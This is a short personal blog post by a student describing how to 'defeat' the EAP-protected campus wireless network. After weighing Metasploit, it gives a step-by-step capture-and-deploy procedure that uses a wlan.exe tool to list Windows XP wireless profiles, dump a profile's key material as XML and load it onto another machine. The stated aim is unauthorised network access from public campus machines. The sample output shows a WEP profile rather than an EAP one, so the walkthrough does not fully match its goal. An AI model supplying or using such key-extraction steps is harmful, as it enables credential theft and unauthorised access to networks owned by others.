Pointers to defeat EAP

This post servers as kind of a note to myself 🙂 EAP stands for extensible authentication protocol. It may be used in 802.11x connections to provide a secure connection. My school currently uses this to provide internet access to various machines around campus; of which some I have access to.   Though, this doesn’t make the equation that much easier. “Hacking exposed wireless” said (page 213) the only practical way to defeat is to steal the key itself. This key is not a plain text the average user keyed in so it can’t be stolen using some wireless key tool. It is a certificate and the same book above suggested that I use metasploit. See also cheat sheet to use metasploit.

But metasploit has a commercial version, the framework typically does nothing much without separate exploit (which can also be downloaded for free, but takes a lot of time). It also requires you to turn off anti virus and firewall (which is something that really inconveniences me since I live in a campus with computer-literate people).

Furthermore, I can’t just walk to a public machine, hook it up for half an hour to install a 100-MB file.   After searching and poking around a bit more, I found the Wireless API (implemented in windows XP 3) which allowed you to interact with Wireless Zero Configuration service and extract the keys into XML files. A security guru from Symantec have developed a tool utilizing this interface so you don’t have to monkey around with Visual Studio.  

Capture phase:

1. Enumerate Interfaces – wlan.exe ei
2. There are 1 interfaces in the system.
3. Interface 0: GUID: 89762a5d-bc6b-4ac6-8cf3-b0462b2bafef Intel(R) PRO/Wireless 3945ABG Network Connection – Teefer2 Miniport
4. State: “disconnected”
5. Command “ei” completed successfully.
6. Get Profile List – wlan.exe gpl 89762a5d-bc6b-4ac6-8cf3-b0462b2bafefThere are 1 profiles on the interface. “Profile1”
7. Command “gpl” completed successfully.
8. Get Profile (profile name is case sensitive)
9. wlan.exe gp Profile1The return profile xml is: <?xml version=”1.0″?> <WLANProfile xmlns=”http://www.microsoft.com/networking/WLAN/profile/v1″> <name>Profile1</name> <SSIDConfig> <SSID> <hex>574C414E2D445341444B</hex> <name>Profile1</name> </SSID> </SSIDConfig> <connectionType>ESS</connectionType> <MSM> <security> <authEncryption> <authentication>open</authentication> <encryption>WEP</encryption> <useOneX>false</useOneX> </authEncryption> <sharedKey> <keyType>networkKey</keyType> <protected>false</protected> <keyMaterial>76A3DEC BA383180E8A18E4E522</keyMaterial> </sharedKey> <keyIndex>0</keyIndex> </security> </MSM> </WLANProfile>
10. Command “gp” completed successfully.

Deploy Phase (setting the profile):

wlan.exe sp 89762a5d-bc6b-4ac6-8cf3-b0462b2bafef C:Profile1.xml

  The post focused on extracting and redeploying keys on Windows XP, but you may find solutions for Windows 7 in the comments.